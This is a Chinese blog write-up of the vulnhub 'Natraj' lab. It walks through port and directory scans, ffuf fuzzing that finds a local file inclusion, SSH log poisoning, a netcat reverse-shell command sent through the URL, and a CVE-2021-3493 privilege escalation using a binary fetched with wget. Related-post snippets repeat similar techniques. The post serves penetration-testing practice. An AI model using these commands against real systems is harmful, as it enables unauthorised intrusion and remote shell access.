靶场练习(3):Natraj

已于 2024-09-11 12:05:13 修改
阅读量429 收藏 4
点赞数 3
分类专栏: vulnhub靶场练习 文章标签: 网络安全 web安全
于 2024-09-11 12:02:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dcy1124/article/details/142132490
版权

靶机ip:172.16.33.18

突破

端口扫描

sudo nmap -p- 172.16.33.18 --open

结果如下:
在这里插入图片描述

特定端口扫描

sudo nmap -p22,80 172.16.33.18 -sV -A

结果如下:

在这里插入图片描述

针对80端口

对其进行路径扫描:

dirsearch -u http://172.16.33.18

结果如下:

在这里插入图片描述

对其进行文件扫描:

dirsearch -u http://172.16.33.18 -f -e txt,php,html.pdf

结果如下:
在这里插入图片描述

查看/console路径,发现file.php:

在这里插入图片描述

考虑搜索其是否有隐藏参数:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:PARAM -w /usr/share/seclists/Fuzzing/UnixAttacks.fuzzdb.txt:VAL -u http://<目标机ip>/console/file.php?PARAM=VAL -fs 0

结果如下,发现本地文件包含漏洞:

在这里插入图片描述

查看是否有ssh登录的日志文件/var/log/auth.log,存在:

在这里插入图片描述

考虑通过ssh登录的方式将脚本植入日志,为防止ssh登录屏蔽脚本,找到.ssh/config文件

cd ~
vi .ssh/config

写入脚本:

在这里插入图片描述
尝试用target登录在日志文件里留下脚本,密码直接Enter即可:

ssh target

直接在URL处输入cmd脚本:
http://172.16.33.18/console/file.php?file=/var/log/auth.log&cmd=nc <本地ip> 1234 |/bin/bash| nc <本地ip> 2345

在这里插入图片描述

做好两个端口的监听,之后访问URL,突破成功。

在这里插入图片描述

提权

升级终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

通过CVE-2021-3493提权

查看系统版本(Ubuntu18.04+Linux4.15+64位系统),可使用CVE-2021-3493
在这里插入图片描述
开始传输,先到/tmp目录,之后通过wget将在本地机上编译好的执行文件下载下来,并增加一个执行权限

cd /tmp
wget http://<本地ip>/<编译好的文件名>
chmod +x <编译好的文件名>

本地端记得开启传输:

sudo python -m http.server 80

执行脚本

在这里插入图片描述

提权成功,打靶完成。

bebabong
关注
专栏目录
OSCP-1-3-natraj(本地文件包含、日志中毒、apache2配置漏洞、nmap提权)
墨痕诉清风的博客
06-30 220
像往常一样,我们将使用“Netdiscover”工具识别主机的 IP。所以,让我们首先用 nmap 列出所有 TCP 端口。我们从访问web服务(80端口)开始,在那里我们找到了几张关于Natraj的图片和信息,我们将查看源代码和robots.txt,似乎没有什么有用的。(或至少,目前)。因此,让我们继续进行。在 Dirb 及其默认字典的帮助下,我们找到了一个名为“”的目录。我们进入并列出一个名为“”的文件:如果我们执行它,我们会看到它什么也不做。我们可能需要添加其他内容。
vulhub-HA:Natraj
2201_75378806的博客
05-14 306
因为这是 auth.log 并且访问机器的唯一方法是通过 ssh。3.在kali上创建一个php的reverseshell并将其上传到目标。检查了是否可以访问任何日志文件(apache2、auth 等)。尝试了不同的 shell(nc、python2、python3)。Python3 是成功的。fuzz大法,看看有没有参数(可以用Bp)一开始是fuzz文件,后来直接fuzz参数。2.使用wget将文件上传到目标机器并复制该文件以替换apache2的实际配置文件。尝试访问这些用户的 ssh 密钥,没成功。
vulnhub HA: Natraj
箭雨镜屋
06-30 1314
渗透思路:nmap扫描----dirb扫描网站目录----ffuf爆破url参数----利用auth.log和LFI获得反弹shell----修改/etc/apache2/apache2.conf获得mahakal的shell----sudo nmap提权
【打靶练习】vulnhub: Natraj
守拙的博客
07-23 293
Natraj靶机操作练习,文件包含、日志注入、apache配置提权、nmap提权
OSCP系列靶场-Esay-Ha-natraj
杳若的博客
08-06 3742
getwebshell → 目录扫描发现端点 → 发现文件读取 → 验证确认是文件包含 → 包含了ssh登录日志 → 反弹shell包含提 权 思 路 → 发现sudo级别的apache2服务 →apache2服务启动时修改其用户权限 → 重启apache2从目录权限提升到用户权限 →sudo-nmap权限提升。
PG::Ha-natraj
aya3t的博客
11-25 664
PROVING GROUNDS::Ha-natraj
Natraj靶场渗透测试
qq_41567985的博客
11-13 170
Natraj靶场渗透测试主要通过文件包含,本地包含ssh登录日志,因为登录日志会记录错误的登录用户名,所以导致了一句话木马的写入。使用蚁剑进入tmp目录,使用wget命令下载mshell.elf文件,并赋予执行权限,执行mshell.elf文件。用户名test被记录进入了该文件,那么我们可以猜测-把用户名写成一句话木马,应该也能被写入。查看日志/vat/log/auth.log 发现记录了ssh登录历史。# 目标机器到tmp目录下下载(有下载权限)使用curl查看该日志文件可以发现。
vulnhub----natraj靶机
woshicainiao666的博客
04-04 682
nmap提权
【OSCP系列】OSCP靶机-Ha-natraj(原创)
Lusen的博客
07-21 719
OSCP系列-Ha-natraj靶场做题记录
拉吉拉曼
02-16
你好呀 :waving_hand: ,我是Natraj 我在Power Platform中工作 我原籍印度,但目前居住在澳大利亚墨尔本 :kangaroo: 。 我是典型印度人的刻板印象-我学习了非CS工程学,但是我目前在技术行业工作。 我最初是一名...
CVE-2021-3156:Sudo 堆缓冲区溢出漏洞
墨痕诉清风的博客
01-28 3397
源码编译安装最新Sudo软件包,下载链接为: https://www.sudo.ws/dist/)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得。解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,1. 进入CVE-2021-3156-main目录下。使用make命令对当前目录下的文件进行编译。根据我们版本,我们选择0,尝试。,获取Root权限,提权成功。查看EXP支持的系统版本。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8499
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
10-10 1268
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 416
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 897
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
什么是网络安全
m0_66268916的博客
10-07 543
全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面,包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行,防止数据被破坏、更改、泄露。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-09 940
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值